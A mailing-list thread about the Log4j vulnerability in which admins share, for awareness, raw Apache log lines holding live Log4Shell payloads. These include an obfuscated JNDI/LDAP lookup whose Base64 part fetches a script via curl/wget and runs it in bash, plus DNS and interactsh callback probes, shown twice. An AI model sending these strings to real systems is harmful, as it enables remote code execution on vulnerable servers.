* [Bloat] Fwd: Log4j mitigation
From: Dave Taht @ 2021-12-13 13:56 UTC
To: bloat

For those of you losing sleep over the Java logging exploit, my heart
goes out to you.

While I'm glad I, personally, and on the bufferbloat related websites,
haven't got a single thing written in Java, and I lost 3 weeks of my
life over Christmas to Spectre, and several weeks per year - and
usually, right around Christmas! - coping with other CVEs.... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, and log out, and
find a tropical island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <jk@ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <jean@ddostest.me>
Cc: <nanog@nanog.org>

You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL),
in headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
be soon.

We have been seeing things like this since the 10th of Dec. And this is
only a typical Apache log file for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}

GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}

GET /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} HTTP/1.1" 200 - "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}

--
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC
* Re: [Bloat] Fwd: Log4j mitigation
From: David Lang @ 2021-12-13 19:42 UTC
To: Dave Taht; +Cc: bloat

Just a note that this doesn't require the code to be written in Java;
any language that runs in a JVM can end up having grief.

David Lang

On Mon, 13 Dec 2021, Dave Taht wrote:

> Date: Mon, 13 Dec 2021 05:56:36 -0800
> From: Dave Taht <dave.taht@gmail.com>
> To: bloat <bloat@lists.bufferbloat.net>
> Subject: [Bloat] Fwd: Log4j mitigation
>
> For those of you losing sleep over the Java logging exploit, my heart
> goes out to you.
>
> While I'm glad I, personally, and on the bufferbloat related websites,
> haven't got a single thing written in Java, and I lost 3 weeks of my
> life over Christmas to Spectre, and several weeks per year - and
> usually, right around Christmas! - coping with other CVEs.... this one
> seems so big and affecting so many other services I use, that I just
> kind of want to take all my cash out of the bank, and log out, and
> find a tropical island somewhere.
>
> ---------- Forwarded message ---------
> From: Jörg Kost <jk@ip-clear.de>
> Date: Mon, Dec 13, 2021 at 3:43 AM
> Subject: Re: Log4j mitigation
> To: Jean St-Laurent <jean@ddostest.me>
> Cc: <nanog@nanog.org>
>
>
> You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL),
> in headers, in anything related to where a Java process does logging
> with Log4j; it's innumerable. It might even evaluate from a URI itself;
> it won't use a fixed port. It's not wormy right now, but maybe it will
> be soon.
>
> We have been seeing things like this since the 10th of Dec. And this is
> only a typical Apache log file for HTTP/HTTPS, where we do logging:
>
> ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
> GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
> "${jndi:dns://45.83.64.1/securityscan-http80}"
> "${jndi:dns://45.83.64.1/securityscan-http80}
> GET
> /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
> HTTP/1.1" 200 -
> "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
> "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}
>
>
>
> --
> I tried to build a better future, a few times:
> https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org
>
> Dave Täht CEO, TekLibre, LLC
> _______________________________________________
> Bloat mailing list
> Bloat@lists.bufferbloat.net
> https://lists.bufferbloat.net/listinfo/bloat